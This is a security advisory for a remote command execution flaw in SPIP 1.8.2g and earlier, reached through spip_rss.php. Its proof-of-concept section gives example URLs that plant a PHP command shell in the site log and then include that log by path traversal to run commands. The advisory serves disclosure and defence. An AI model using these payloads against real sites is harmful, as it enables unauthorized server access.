SPIP Spip_RSS.PHP Remote Command Execution Vulnerability
BID:16556
Info
SPIP Spip_RSS.PHP Remote Command Execution Vulnerability
| Bugtraq ID: | 16556 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Feb 08 2006 12:00AM |
| Updated: | Feb 08 2006 10:33PM |
| Credit: | rgod <[email protected]> is credited with the discovery of this vulnerability. |
| Vulnerable: |
SPIP SPIP 1.8.2 g SPIP SPIP 1.8.2-f SPIP SPIP 1.8.2-e SPIP SPIP 1.8.2-d |
| Not Vulnerable: | |
Discussion
SPIP Spip_RSS.PHP Remote Command Execution Vulnerability
SPIP is prone to a remote command-execution vulnerability. This is due to a lack of proper sanitization of user-supplied input.
An attacker can exploit this issue to execute arbitrary remote PHP commands on an affected computer with the privileges of the webserver process.
Successful exploitation could facilitate unauthorized access; other attacks are also possible.
Version 1.8.2g and earlier are vulnerable; other versions may also be affected.
SPIP is prone to a remote command-execution vulnerability. This is due to a lack of proper sanitization of user-supplied input.
An attacker can exploit this issue to execute arbitrary remote PHP commands on an affected computer with the privileges of the webserver process.
Successful exploitation could facilitate unauthorized access; other attacks are also possible.
Version 1.8.2g and earlier are vulnerable; other versions may also be affected.
Exploit / POC
SPIP Spip_RSS.PHP Remote Command Execution Vulnerability
An exploit is not required.
Example URI have been provided:
http://www.example.com/spip_rss.php?GLOBALS[type_urls]=/../ecrire/data/spip.log%00
http://www.example.com/spip_acces_doc.php3?id_document=0&file=<?system($_GET[cmd]);?>
http://www.example.com/spip_rss.php?cmd=ls%20-la&GLOBALS[type_urls]=/../ecrire/data/spip.log%00
An exploit is not required.
Example URI have been provided:
http://www.example.com/spip_rss.php?GLOBALS[type_urls]=/../ecrire/data/spip.log%00
http://www.example.com/spip_acces_doc.php3?id_document=0&file=<?system($_GET[cmd]);?>
http://www.example.com/spip_rss.php?cmd=ls%20-la&GLOBALS[type_urls]=/../ecrire/data/spip.log%00
Solution / Fix
SPIP Spip_RSS.PHP Remote Command Execution Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.